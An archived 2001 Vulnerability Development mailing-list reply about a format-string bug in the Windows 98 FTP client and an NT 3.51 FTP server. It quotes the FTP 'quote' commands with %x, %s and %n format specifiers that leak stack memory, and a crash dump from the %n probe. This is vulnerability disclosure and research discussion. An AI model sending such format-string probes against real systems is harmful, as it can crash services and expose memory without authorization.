Vulnerability Development mailing list archives
Re: Microsoft FTP Program
From: "Eric D. Williams" <eric () INFOBRO COM>
Date: Fri, 23 Mar 2001 09:03:26 -0500
While this may work on newer versions of the FTP server (that link to inetinfo) it seems older versions (3.51) are not vulnerable. Interesting, output from the 500 response may be worth a little exploration though. 220 server Windows NT FTP Server (Version 3.51). 230 Anonymous user logged in as ftp (guest access). ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x 500 '0x16382d0.0x16394d0.0x0.0x78257830.0x2578302e.0x78302e78.0x302e7825.0x2e782 578': command not understood ftp> quote %s 500 'ic?'': command not understood ftp> quote %n 500 '': command not understood ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. . .. pub Security users 226 Transfer complete. 39 bytes received in 0.00 seconds (39000.00 Kbytes/sec) ftp> quit Eric Williams, Pres. Information Brokers, Inc. Phone: +1 202.889.4395 http://www.infobro.com/ Fax: +1 202.889.4396 mailto:eric () infobro com For More Info: info () infobro com PGP Public Key http://new.infobro.com/KeyServ/EricDWilliams.asc Finger Print: 1055 8AED 9783 2378 73EF 7B19 0544 A590 FF65 B789 On Wednesday, March 21, 2001 7:48 AM, SteeLe [SMTP:steeLe () PRIVACYX COM] wrote:
While playin around in the Microsoft FTP program that came with Windows 98 I came across the following : Connected to l33t host. 220 FTP server (Version 6.00LS) ready. User (somewhere()): ftp 331 Guest login ok, send your email address as password. Password: 230 Guest login ok, access restrictions apply. ftp> quote Command line to send Usage: quote line to send. ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x 500 '0X7800BB4B.0X10072B8.0X1008820.0X0.0X56F3E8.0X78257830.0X2578302E.0X78302E7 8': command not understood. ftp> quote %s 500 '+(|X+++YX++_ZX++|QX+++VX++ÇQX++êSX+++¦X++_ÄX++4òX+++òX++- VX+++V X+++VX+J_0___T__¦W_Y__T_Uï_QQVW+-¦XH': command not understood. ftp> quote %n And that crashed the program...... FTP caused an invalid page fault in module KERNEL32.DLL at 0167:bff9d709. Registers: EAX=c00300f0 CS=0167 EIP=bff9d709 EFLGS=00010216 EBX=00000000 SS=016f ESP=0052feb8 EBP=00530154 ECX=00000000 DS=016f ESI=00690100 FS=1c2f EDX=780376e8 ES=016f EDI=01001550 GS=0000 Bytes at CS:EIP: 53 8b 15 dc 9c fc bf 56 89 4d e4 57 89 4d dc 89 Stack dump: I do know that the ftp program in most linux distros had this problem a while back but who knew it would pass on to Windows. Might not be important but someone should comment on this :) SteeLe << File: ATT00001.htm >>
Current thread:
- Microsoft FTP Program SteeLe (Mar 22)
- <Possible follow-ups>
- Re: Microsoft FTP Program Syzop (Mar 23)
- Re: Microsoft FTP Program Jose Nazario (Mar 23)
- Re: Microsoft FTP Program Eric D. Williams (Mar 23)
- Re: Microsoft FTP Program Bruno Lustosa (Mar 23)
- Re: Microsoft FTP Program Eric D. Williams (Mar 25)